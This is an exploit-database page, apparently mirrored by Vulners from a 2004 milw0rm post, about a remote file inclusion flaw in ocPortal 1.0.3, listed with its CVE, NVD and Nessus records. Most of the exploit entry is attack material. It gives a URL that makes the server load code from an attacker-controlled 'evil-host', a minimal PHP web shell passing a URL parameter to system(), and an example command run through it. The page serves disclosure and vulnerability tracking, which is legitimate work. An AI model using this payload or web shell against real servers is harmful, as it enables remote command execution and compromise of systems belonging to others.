Lucene search
+L

ocPortal 1.0.3 - Remote File Inclusion

🗓️ 13 Oct 2004 00:00:00Reported by ExoduksType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 93 Views

ocPortal 1.0.3 is vulnerable to Remote File Inclusion allowing execution of arbitrary commands.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-1592
20 Feb 200505:00
cve
cvelist
Cvelist
CVE-2004-1592
20 Feb 200505:00
cvelist
euvd
EUVD
EUVD-2004-1586
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-1592
31 Dec 200405:00
nvd
nessus
Tenable Nessus
ocPortal index.php req_path Parameter Remote File Inclusion
13 Oct 200400:00
nessus
http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



   <?php

     $com = $_GET["com"];

     system ("$com");

   ?>



  Example of funcs.php if your host support php.



   <?php

     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

   ?>



  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls


# milw0rm.com [2004-10-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Oct 2004 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03053
93